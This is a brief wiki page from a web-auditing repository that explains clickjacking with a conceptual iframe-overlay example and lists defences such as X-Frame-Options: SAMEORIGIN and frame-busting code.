Clickjacking - TairinySimeonato/WebAuditing GitHub Wiki

  • Clickjacking is a malicious attack where the client is lured into clicking on something different from what the he/she think it is
  • This happens with an embedded code or script that can be executed without the user's knowledge
  • For example: the user clicks a button that appears to perform another function

How does the attack work?

  1. A user visits a malicious page.
  2. The page has a link on it that looks from a legit site ("Get your Iphone free now!!", for example).
  3. Over that link the evil website puts a transparent <iframe> with src from facebook.com, in such a way that the “Like” button is right above that link.
  4. In attempting to click the link, the visitor in fact clicks the button, liking something from facebook.

Defenses

  • Instruct the browser to not allow framing from other domains.
  • Employing defensive code in the user interface to ensure that the current frame is the most top level window.
  • Use X-Frame-Options: SAMEORIGIN

Sources

⚠️ **GitHub.com Fallback** ⚠️